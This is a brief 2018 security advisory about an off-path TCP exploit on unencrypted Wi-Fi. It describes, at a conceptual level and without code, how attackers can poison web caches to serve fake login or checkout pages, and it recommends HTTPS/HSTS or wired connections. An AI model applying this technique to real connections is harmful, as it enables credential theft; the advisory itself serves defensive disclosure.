Off-Path TCP Exploit Allows Attackers To Steal Data Via Unencrypted Connections
(Sep 21, 2018)
Associate Professor Zhiyun Qian and doctoral student Weiteng Chen from the University of California discovered a vulnerability in unencrypted Wi-Fi routers that makes them susceptible to a TCP exploit. The exploit can be employed when threat actors intercept the communication between the router and a user’s machine, and send a malicious payload that appears legitimate to poison the web cache. This allows the threat actor to inject a malicious copy of a web page (typically a login or checkout page one is visiting) so that every time that page is visited, it is the compromised version. This has the potential to give the actor access to the information and credentials entered in those sites. This vulnerability is in all operating systems (macOS, Windows, and Linux), and have yet to see a patch.
Recommendation: As a patch has yet to be released or developed for this vulnerability, it is recommended to only browse sites with built-in HTTPS or HSTS encryption. Connecting to internet via an Ethernet cable instead of Wi-Fi connection is another solution. Ensure you are consistently on an encrypted connection because this vulnerability is only present in unencrypted connections.
Indicators of Compromise (IOCs) associated with this story can be viewed by ThreatStream users here to identify potential malicious activity.